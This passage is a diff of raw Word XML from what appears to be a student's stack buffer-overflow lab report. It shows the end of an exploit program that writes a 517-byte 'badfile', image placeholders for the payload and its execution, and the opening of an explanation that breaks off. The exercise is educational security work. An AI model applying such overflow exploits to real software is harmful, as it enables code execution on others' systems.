+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>/* Save the contents to the file "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="008000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>" */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>fopen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"./</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>"w"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>fwrite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>buffer</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>517</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="FF8000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>fclose</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:pBdr>
+          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Monaco" w:eastAsia="宋体" w:hAnsi="Monaco" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="13"/>
+          <w:szCs w:val="13"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>y final version of “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>”:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36CD3F5E" wp14:editId="03414183">
+            <wp:extent cx="2405188" cy="3809211"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
+            <wp:docPr id="8" name="图片 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2417701" cy="3829029"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xecution:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22CC09BC" wp14:editId="2FB5CBFC">
+            <wp:extent cx="5274310" cy="1299210"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="2" name="图片 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5274310" cy="1299210"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>xplanation:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">irst, after class we know that the way to do a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>STACK-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>OVERFLOW</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack is to design </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
